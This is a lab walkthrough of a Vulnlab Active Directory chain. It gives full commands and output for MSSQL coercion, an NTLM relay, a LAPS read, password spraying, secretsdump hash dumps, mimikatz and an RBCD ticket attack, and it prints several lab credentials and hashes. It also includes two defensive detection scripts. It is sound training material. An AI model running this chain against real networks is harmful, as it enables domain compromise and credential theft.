vulnlab-reflection

Reflection is a medium-difficulty Active Directory chain of three machines: MS01, WS01 and DC01. On MS01, MSSQL staging credentials are found on an SMB share. Through the staging database we relay the SQL service account's NTLM authentication to DC01's SMB shares, where that service account can read the prod share, which holds the production database credentials. The production database yields two domain credentials. abbie.smith has GenericAll on MS01, which lets us read MS01's LAPS password; dumping MS01's credential vault then gives us Georgia.Price's password, and Georgia.Price has GenericAll on WS01. With full control of MS01 we configure Resource-Based Constrained Delegation (RBCD) on WS01, dump WS01 and obtain Rhys.Garner's password, which is reused by DOM_RGARNER, a member of Domain Admins.

Writeup:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares

SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ms01.reflection.vl 445    MS01             [+] reflection.vl\puck: 
SMB         ms01.reflection.vl 445    MS01             [+] Enumerated shares
SMB         ms01.reflection.vl 445    MS01             Share           Permissions     Remark
SMB         ms01.reflection.vl 445    MS01             -----           -----------     ------
SMB         ms01.reflection.vl 445    MS01             ADMIN$                          Remote Admin
SMB         ms01.reflection.vl 445    MS01             C$                              Default share
SMB         ms01.reflection.vl 445    MS01             IPC$            READ            Remote IPC
SMB         ms01.reflection.vl 445    MS01             staging         READ            staging environment
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging      

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

        6261245 blocks of size 4096. 1153753 blocks available
smb: \> cat staging_db.conf
cat: command not found
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf 
user=web_staging
password=Washroom510
db=staging   

MSSQL enumeration

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   

guest                public     NULL        NULL        guest           b'2         '   b'00'   

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   

sys                  public     NULL        NULL        NULL            b'4         '    NULL   

SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)>
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE'
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

john svc_web_staging.hash --wordlist=/usr/share/wordlists/rockyou.txt   -> uncrackable

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share . 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []

Next we relay the NTLM authentication to dc01.reflection.vl with ntlmrelayx:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!

We trigger the authentication again from our SQL shell:

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

and in another terminal window on the Kali box we connect to the interactive SMB shell that ntlmrelayx opened:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000                     
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
# 

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf 
user=web_prod
password=Tr<redacted>01
db=prod
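The relay above only works because the target accepts unsigned SMB sessions: the crackmapexec banners in this writeup report `signing:False` for DC01 as well as MS01. As an added example (not part of the original writeup), the script below parses banner lines in that crackmapexec format and flags every host that does not require SMB signing, rating domain controllers higher because a relay to a DC is what exposed the prod share here. The sample lines are constructed, modelled on the banners on this page; the WS01 line and the list of domain controllers are assumptions.

```python
import re

# Constructed sample output in the crackmapexec SMB banner format used in this writeup.
# The WS01 line is an assumption; the page never shows WS01's own banner.
SAMPLE_CME_OUTPUT = """\
SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    WS01             [*] Windows 10 Build 19045 x64 (name:WS01) (domain:reflection.vl) (signing:True) (SMBv1:False)
SMB         dc01.reflection.vl 445    DC01             [+] reflection.vl\\puck:
"""

# One banner line: "SMB <host> <port> <name> [*] <os> (name:X) (domain:Y) (signing:Z) (SMBv1:W)"
BANNER_RE = re.compile(
    r"^SMB\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+\[\*\]\s+(?P<os>.+?)\s+"
    r"\(name:(?P<netbios>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


def parse_banners(text):
    """Return one dict per banner line; login-result lines ([+]/[-]) are ignored."""
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["port"] = int(d["port"])
        d["signing"] = d["signing"] == "True"
        d["smbv1"] = d["smbv1"] == "True"
        hosts.append(d)
    return hosts


def relay_exposed(hosts, domain_controllers=()):
    """Hosts that do not require SMB signing can be the target of an NTLM relay.

    A domain controller without signing is rated HIGH: relaying a service
    account to it exposes its shares, as happened with the prod share here.
    """
    dcs = {dc.upper() for dc in domain_controllers}
    findings = []
    for h in hosts:
        if h["signing"]:
            continue
        findings.append({
            "host": h["host"],
            "netbios": h["netbios"],
            "severity": "HIGH" if h["netbios"].upper() in dcs else "MEDIUM",
            "smbv1": h["smbv1"],
        })
    return findings


def report(findings):
    """Human-readable lines, one per exposed host."""
    return [f'{f["severity"]}: {f["host"]} ({f["netbios"]}) does not require SMB signing'
            for f in findings]


if __name__ == "__main__":
    for line in report(relay_exposed(parse_banners(SAMPLE_CME_OUTPUT), ("DC01",))):
        print(line)
```

The fix on the defending side is the policy "Microsoft network server: Digitally sign communications (always)" on the DC and member servers; once signing is required, the relayed session in the ntlmrelayx output above is rejected even though the authentication itself succeeded.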

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL       dc01.reflection.vl 1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL       dc01.reflection.vl 1433   DC01             [+] web_prod:Tribesman201 
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.

Connect with sqsh to dc01.reflection.vl:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'

sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id:       1
name:     abbie.smith
password: CM<redacted>Ew
 
id:       2
name:     dorothy.rose
password: hC<redacted>SJ
 
(2 rows affected)

LDAP search to build a list of domain users:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.

BloodHound collection:

bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp

Check the machine account quota:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        dc01.reflection.vl 389    DC01             [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ 
MAQ         dc01.reflection.vl 389    DC01             [*] Getting the MachineAccountQuota
MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0

Check LAPS:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps 
SMB         DC01            445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        DC01            389    DC01             [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw 
LAPS        DC01            389    DC01             [*] Getting LAPS Passwords
LAPS        DC01            389    DC01             Computer: MS01$                Password: H44<redacted>}xi

Spray the LAPS password against the user list on ws01.reflection.vl:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth
SMB         ws01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    MS01             [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB         ws01.reflection.vl 445    MS01             [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\DC01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\krbtgt:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\MS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\WS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] 

Run secretsdump:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We use the admin account to RDP to the box and start enumerating it:

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx 

On MS01 we disable Defender, upload mimikatz.exe and find the credentials of Georgia.Price:
Georgia.Price
DBl<redacted>id

RBCD attack on ws01.reflection.vl (via MS01)

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi

[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'


Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)
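The write above changes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the WS01 computer object, which is exactly the change a domain should alert on. As an added example (not from the original writeup), the script below runs a detection over Windows Security event 5136 ("A directory service object was modified") records and raises an alert whenever that attribute is written, treating writers outside an allow-list as HIGH. The event records are constructed dicts in the shape of the 5136 fields; the writer names, timestamps and the allow-list are assumptions. Event 5136 is only generated when "Audit Directory Service Changes" is enabled and the computer objects carry a SACL for Write Property.

```python
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# OperationType values used by event 5136.
OPERATION = {"%%14674": "value added", "%%14675": "value deleted"}

# Constructed 5136/4624 records, modelled on the RBCD write shown above.
# The timestamps and the svc_adconfig account are assumptions.
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": "2024-07-19T09:50:12Z",
     "SubjectDomainName": "REFLECTION", "SubjectUserName": "Georgia.Price",
     "ObjectDN": "CN=WS01,CN=Computers,DC=reflection,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},
    {"EventID": 5136, "TimeCreated": "2024-07-19T10:02:40Z",
     "SubjectDomainName": "REFLECTION", "SubjectUserName": "svc_adconfig",
     "ObjectDN": "CN=WS01,CN=Computers,DC=reflection,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14675"},
    {"EventID": 5136, "TimeCreated": "2024-07-19T10:05:01Z",
     "SubjectDomainName": "REFLECTION", "SubjectUserName": "abbie.smith",
     "ObjectDN": "CN=MS01,CN=Computers,DC=reflection,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
    {"EventID": 4624, "TimeCreated": "2024-07-19T10:06:30Z",
     "SubjectDomainName": "REFLECTION", "SubjectUserName": "Georgia.Price"},
]


def target_name(dn):
    """First RDN of the object DN, e.g. 'WS01' from 'CN=WS01,CN=Computers,...'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def detect_rbcd_changes(events, allowed_writers=frozenset()):
    """Alert on every 5136 event that touches the RBCD attribute.

    allowed_writers holds DOMAIN\\user names that are expected to manage
    delegation; anything else is HIGH because the attribute lets the listed
    account impersonate users to the target computer via S4U2Proxy.
    """
    allowed = {w.lower() for w in allowed_writers}
    alerts = []
    for e in events:
        if e.get("EventID") != 5136 or e.get("AttributeLDAPDisplayName") != RBCD_ATTR:
            continue
        writer = f'{e.get("SubjectDomainName", "")}\\{e.get("SubjectUserName", "")}'
        alerts.append({
            "time": e.get("TimeCreated"),
            "target": target_name(e.get("ObjectDN", "")),
            "writer": writer,
            "operation": OPERATION.get(e.get("OperationType"), e.get("OperationType")),
            "severity": "INFO" if writer.lower() in allowed else "HIGH",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_rbcd_changes(SAMPLE_EVENTS, {"REFLECTION\\svc_adconfig"}):
        print(f'{a["severity"]} {a["time"]} {a["writer"]} {a["operation"]} on {a["target"]}')
```

Because the attribute was empty before the write (the "Attribute ... is empty" line above), a single "value added" event on a workstation object by an ordinary user account is the whole signal; there is no legitimate reason for a help-desk or application account to populate it.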

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache  

and a secretsdump against ws01.reflection.vl:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM 
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
